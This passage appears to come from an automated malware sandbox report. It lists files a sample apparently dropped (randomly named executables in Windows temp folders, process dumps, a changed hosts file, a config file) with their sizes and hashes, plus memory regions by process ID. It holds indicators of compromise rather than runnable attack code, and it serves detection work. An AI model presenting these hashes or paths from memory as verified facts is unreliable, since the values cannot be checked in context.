                                    • C:\Windows\SysWOW64\wpcap.dll

                                      Filesize

                                      275KB

                                      MD5

                                      4633b298d57014627831ccac89a2c50b

                                      SHA1

                                      e5f449766722c5c25fa02b065d22a854b6a32a5b

                                      SHA256

                                      b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

                                      SHA512

                                      29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

                                    • C:\Windows\TEMP\ciubbeybg\config.json

                                      Filesize

                                      693B

                                      MD5

                                      f2d396833af4aea7b9afde89593ca56e

                                      SHA1

                                      08d8f699040d3ca94e9d46fc400e3feb4a18b96b

                                      SHA256

                                      d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

                                      SHA512

                                      2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

                                    • C:\Windows\TEMP\gybaengyl\2124.dmp

                                      Filesize

                                      4.2MB

                                      MD5

                                      f2351dc5ffa00cbc8ffac9816a114152

                                      SHA1

                                      5e7d4435e6a27814444a60d800583ca4e7d6044f

                                      SHA256

                                      66bca060e4e961d84d216b8a9692d0659e15b7fcf45f9c6770399921f9569fa5

                                      SHA512

                                      c9ca5fbde6493e0b67ce5b6d986fda9a893815198d54c1498af19fecade61d50b05bd6a89e65a297f99917bcb5e6388821278df7458bc6f12a5bdf509868af93

                                    • C:\Windows\TEMP\gybaengyl\2168.dmp

                                      Filesize

                                      2.9MB

                                      MD5

                                      3252f24499636b471d9cf193451ff562

                                      SHA1

                                      9e64f86981ecac4d7386a66c2f72ae23d708fc65

                                      SHA256

                                      f78daa9923588a5495462a4a1c4fab4617d8cb3dcfa844ac285b321076ec51fa

                                      SHA512

                                      a9dfce4b55307a1d5820e69d3d8958b19be96ce2a2df035f572654d74f995199aedabd0e91e587a4bca2e0652a05149bce78bad63a9e70b5e0b9be8f6517316c

                                    • C:\Windows\TEMP\gybaengyl\2608.dmp

                                      Filesize

                                      7.6MB

                                      MD5

                                      970e64ddf00fd61cf136c0a90919bf74

                                      SHA1

                                      5878df9641b0817706a5eea860666068e82eb0a9

                                      SHA256

                                      cb7b35068d7b2e98cbdac905c99c19ab3699d1d4926c42b8dffb526b433e5a9b

                                      SHA512

                                      e8c64d1be71a148ff104345a1cb9610242b7dbf989efac4d0c872a2ba306d18cc86859cd460dcfb06ab912bc8885cafdb230b050dc6775dcca966bedab2ccfe5

                                    • C:\Windows\TEMP\gybaengyl\2716.dmp

                                      Filesize

                                      1.2MB

                                      MD5

                                      14ed1fd60927d405fa35a9d3b553af0e

                                      SHA1

                                      b6aaf70e45ec6ab02a2904d15dec330bb8c8b70d

                                      SHA256

                                      71df350606cbda05e1fda0844367a57cb5dedcbe1d8951db1d9b25825fad7eec

                                      SHA512

                                      f6410e01304ed88ae44e96ffcf261f83a1bf65b16531ae6f3c7d44f437d56d2f02babb5263ecf2913b0f6667eca2b16f314ab8bb675047f92f44e8d62fd36f23

                                    • C:\Windows\TEMP\gybaengyl\2936.dmp

                                      Filesize

                                      818KB

                                      MD5

                                      67c29d22cb87e5e5bc484e7f106c0a3a

                                      SHA1

                                      bf5e9b634ea9d6af0a7271de0e21c509a46f8937

                                      SHA256

                                      a82ff2f36c9a443e2434b20bcc676a32e80b3ce8d26d3ba6c77ff7a7293add17

                                      SHA512

                                      c9ae29a2e1384819e82a06308a333ff9f62a913d3c45970ee35d3b877d8defb0c159bb0ea77b38dfd0e7c4eae435538463b488cb5bbd90c19340efc2be29a450

                                    • C:\Windows\TEMP\gybaengyl\3016.dmp

                                      Filesize

                                      3.7MB

                                      MD5

                                      ab05c29b71de5a3eabe688131515e83b

                                      SHA1

                                      100220bd7ff76034383919620c80cfde1874a1c2

                                      SHA256

                                      f67629dace4bf4ed6bb86fa40c821141ac38047f63de0504beb409c2b9c187ae

                                      SHA512

                                      aec3c7304d47ab399a255da262806a06294a9b404c9568017b19cb7b38289bebb2d75fd40e9aa7150066d760ddcf304acb15a65648e6f1a9fea504d5f50907c1

                                    • C:\Windows\TEMP\gybaengyl\3156.dmp

                                      Filesize

                                      26.3MB

                                      MD5

                                      f1619aa9e78da46ac00badd5cea81df7

                                      SHA1

                                      13fe467eae77ac5ad60043c52fe3db8ec1e93c6e

                                      SHA256

                                      73eb722b1ab845ef8ea5b3d07e4cad89ab08a5a04ed0d92e48ab71e127b3d5f5

                                      SHA512

                                      037098ac83dd4bf1dc63a55ce5676e62b231587bc94493db5bf88aef022abaf38f2bb2e7c9ac96bcab1f5d1dcfe754bc688e9561b8e71ce3343ae4556e2758bd

                                    • C:\Windows\TEMP\gybaengyl\316.dmp

                                      Filesize

                                      33.3MB

                                      MD5

                                      9ca3f1d126f28b08f1595b04b41c49a4

                                      SHA1

                                      ea960669788e0acf2c35427a77010ce7e0ccd0e5

                                      SHA256

                                      d9a5a6120e7888983d80d00349d97caabde705a8ea53b49848525575b0e1b067

                                      SHA512

                                      f7f55d22218f903bfbca132ee1bc1f54c04fc96029809f8c25ca677272be663ba1bd5c9569af2de3af2fd001a15275fe45b15c02e01b995cd42e44f4d1d450b6

                                    • C:\Windows\TEMP\gybaengyl\3804.dmp

                                      Filesize

                                      2.5MB

                                      MD5

                                      b6d5a985eb928a49424b403e61f16b14

                                      SHA1

                                      7699e30f36ff4a16ee878281bd596bfcef076907

                                      SHA256

                                      6efb339b9eae689776448958530c4c17e2f37b6c9a94f66d0fb7b4ab88aa1c64

                                      SHA512

                                      28db435d1d3a20b7c21dc958dba1648067ec844ce42e40a9e1dc5ae412e137b761389f669523f1cfda23ac667c0e5636d43f30a175e70532884982de68693fe8

                                    • C:\Windows\TEMP\gybaengyl\3896.dmp

                                      Filesize

                                      20.8MB

                                      MD5

                                      ba2428253e8f12f8e9c72af386dd9b43

                                      SHA1

                                      d21ea5e521248f9693f2f1cc955235fd65740873

                                      SHA256

                                      789767b1f009f440dd419837f1e936cbb652fb98e673fa9ef778efcdade62251

                                      SHA512

                                      553e99b0bf4fd8b56a8165ab0e539e8b0769acdb096c0e4936fd54ab3a19f44cdca4a33c4e6543dad9c6c2e63bce5365688b2489adcfc2527d3ccaa340b9a778

                                    • C:\Windows\TEMP\gybaengyl\3960.dmp

                                      Filesize

                                      4.1MB

                                      MD5

                                      67c5b251bf7f2f32dc9b83f287d7ccf4

                                      SHA1

                                      690cc44451f13780625745d8f645dba96b6718e1

                                      SHA256

                                      97a43388ec2f0e5282b7efc49d97bc6e5213a69004bf1d5a477d506ac96aa4bc

                                      SHA512

                                      31f2e35ce0976550f0df43bd0aa53c0948ce5d96eddee140ffce2b044c0ebab40ab50b045832fcee23b02ed1c0a8ec87622e03fb6c4a0199b8c11ac0838e4e5f

                                    • C:\Windows\TEMP\gybaengyl\4056.dmp

                                      Filesize

                                      45.4MB

                                      MD5

                                      7a58191b1cacf876015388b1ec8a30b8

                                      SHA1

                                      9389ec3e54b9a32cb25a6e4c7614aab981000e8f

                                      SHA256

                                      343671a1789e7587723a55c99a518f71bf79ebd21b381a6f53c80c1dc1a03679

                                      SHA512

                                      5512c5ec9ad08b013b10fee5ec4b018fa6dcdf6e52cd932dde60276781d47f035abe458cbce4de8c1485d07d200c6dcd3774e17e067f5223deb17185a46a5ca1

                                    • C:\Windows\TEMP\gybaengyl\4576.dmp

                                      Filesize

                                      8.4MB

                                      MD5

                                      a3de1cc5299f9181fb5c9ed05e9b2913

                                      SHA1

                                      83f979c1bc3f833322b950e7d8b38528514b5949

                                      SHA256

                                      16f60c5c7f8e8fa1870dd00b10391be38846672f4a90725dc178dada328b0506

                                      SHA512

                                      46064b3bb46518a3b174fed69e6c299a3d1a9745f8d341d29cae6b151fa359641a731637b85cc79594c49bd6e0d5e66ead2e97aea69c311c19e62edbc29daa8d

                                    • C:\Windows\TEMP\gybaengyl\800.dmp

                                      Filesize

                                      2.3MB

                                      MD5

                                      0cd5d1ba30d747bd7153820204375bda

                                      SHA1

                                      f554a42c6e024707c176923e0e06b94daaf549df

                                      SHA256

                                      76edf88f002ded5ceca6cb0b09220a56a6a9d8b9a7f8d829183c16c111bd4979

                                      SHA512

                                      af5d0c4d0e6b166e81f69e209797af1803e6eeaa5b747ddaa4a0d6837be3100476ddb0f2cde2ab95c6ebb28f5ffe5a689f1acac37e4da8aaf89c8385390ce189

                                    • C:\Windows\Temp\ciubbeybg\auelfz.exe

                                      Filesize

                                      343KB

                                      MD5

                                      2b4ac7b362261cb3f6f9583751708064

                                      SHA1

                                      b93693b19ebc99da8a007fed1a45c01c5071fb7f

                                      SHA256

                                      a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

                                      SHA512

                                      c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

                                    • C:\Windows\Temp\gybaengyl\sibyhtagb.exe

                                      Filesize

                                      126KB

                                      MD5

                                      e8d45731654929413d79b3818d6a5011

                                      SHA1

                                      23579d9ca707d9e00eb62fa501e0a8016db63c7e

                                      SHA256

                                      a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

                                      SHA512

                                      df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

                                    • C:\Windows\Temp\nssB004.tmp\System.dll

                                      Filesize

                                      11KB

                                      MD5

                                      2ae993a2ffec0c137eb51c8832691bcb

                                      SHA1

                                      98e0b37b7c14890f8a599f35678af5e9435906e1

                                      SHA256

                                      681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

                                      SHA512

                                      2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

                                    • C:\Windows\Temp\nssB004.tmp\nsExec.dll

                                      Filesize

                                      6KB

                                      MD5

                                      b648c78981c02c434d6a04d4422a6198

                                      SHA1

                                      74d99eed1eae76c7f43454c01cdb7030e5772fc2

                                      SHA256

                                      3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

                                      SHA512

                                      219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

                                    • C:\Windows\Temp\xohudmc.exe

                                      Filesize

                                      72KB

                                      MD5

                                      cbefa7108d0cf4186cdf3a82d6db80cd

                                      SHA1

                                      73aeaf73ddd694f99ccbcff13bd788bb77f223db

                                      SHA256

                                      7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

                                      SHA512

                                      b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

                                    • C:\Windows\gybaengyl\Corporate\vfshost.exe

                                      Filesize

                                      381KB

                                      MD5

                                      fd5efccde59e94eec8bb2735aa577b2b

                                      SHA1

                                      51aaa248dc819d37f8b8e3213c5bdafc321a8412

                                      SHA256

                                      441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

                                      SHA512

                                      74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

                                    • C:\Windows\gybaengyl\abausqena\byneybtbu.exe

                                      Filesize

                                      332KB

                                      MD5

                                      ea774c81fe7b5d9708caa278cf3f3c68

                                      SHA1

                                      fc09f3b838289271a0e744412f5f6f3d9cf26cee

                                      SHA256

                                      4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

                                      SHA512

                                      7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

                                    • C:\Windows\gybaengyl\abausqena\wpcap.exe

                                      Filesize

                                      424KB

                                      MD5

                                      e9c001647c67e12666f27f9984778ad6

                                      SHA1

                                      51961af0a52a2cc3ff2c4149f8d7011490051977

                                      SHA256

                                      7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

                                      SHA512

                                      56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

                                    • C:\Windows\system32\drivers\etc\hosts

                                      Filesize

                                      1KB

                                      MD5

                                      c838e174298c403c2bbdf3cb4bdbb597

                                      SHA1

                                      70eeb7dfad9488f14351415800e67454e2b4b95b

                                      SHA256

                                      1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

                                      SHA512

                                      c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

                                    • C:\Windows\tiagluue\wyzubbc.exe

                                      Filesize

                                      9.7MB

                                      MD5

                                      9f0e13a647f69b3f4160eb986f9825b5

                                      SHA1

                                      d418a74fb5e04f69d386a5c17ca6eb6b3a49f2d1

                                      SHA256

                                      a01a8954b07f4b7a9f8ea0392eea6cb696211a0a7f3f51e1982d24fd5c47d0d2

                                      SHA512

                                      b29c82753e321317c082cfcb95484d5e49902ad7f88c59cc90fe788b1a181217fd68295383354bc96c4bfadb9c0a1286a1cbe97e5991734f8342b9d3ca854d1d

                                    • memory/1264-220-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/1440-198-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/1452-229-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/1452-190-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/1916-203-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/2092-186-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/2236-181-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/2404-8-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                      Filesize

                                      6.6MB

                                    • memory/2484-78-0x0000000000F60000-0x0000000000FAC000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/2704-172-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/2828-217-0x00007FF6B0120000-0x00007FF6B0240000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2828-161-0x00007FF6B0120000-0x00007FF6B0240000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2828-183-0x00007FF6B0120000-0x00007FF6B0240000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2828-178-0x00007FF6B0120000-0x00007FF6B0240000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2828-253-0x00007FF6B0120000-0x00007FF6B0240000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2828-200-0x00007FF6B0120000-0x00007FF6B0240000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2828-233-0x00007FF6B0120000-0x00007FF6B0240000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2828-167-0x000002F382870000-0x000002F382880000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/2828-222-0x00007FF6B0120000-0x00007FF6B0240000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/2964-146-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/2964-142-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/3208-152-0x0000000010000000-0x0000000010008000-memory.dmp

                                      Filesize

                                      32KB

                                    • memory/3208-169-0x0000000000400000-0x0000000000412000-memory.dmp

                                      Filesize

                                      72KB

                                    • memory/3220-135-0x00007FF6BFE70000-0x00007FF6BFF5E000-memory.dmp

                                      Filesize

                                      952KB

                                    • memory/3220-138-0x00007FF6BFE70000-0x00007FF6BFF5E000-memory.dmp

                                      Filesize

                                      952KB

                                    • memory/3224-235-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/3440-176-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/3500-232-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/3580-215-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/3972-239-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/4004-194-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/4428-249-0x0000000000F70000-0x0000000000F82000-memory.dmp

                                      Filesize

                                      72KB

                                    • memory/4792-4-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                      Filesize

                                      6.6MB

                                    • memory/4792-0-0x0000000000400000-0x0000000000AA4000-memory.dmp

                                      Filesize

                                      6.6MB

                                    • memory/4900-207-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/5004-237-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/5088-225-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB

                                    • memory/6076-251-0x00007FF624A60000-0x00007FF624ABB000-memory.dmp

                                      Filesize

                                      364KB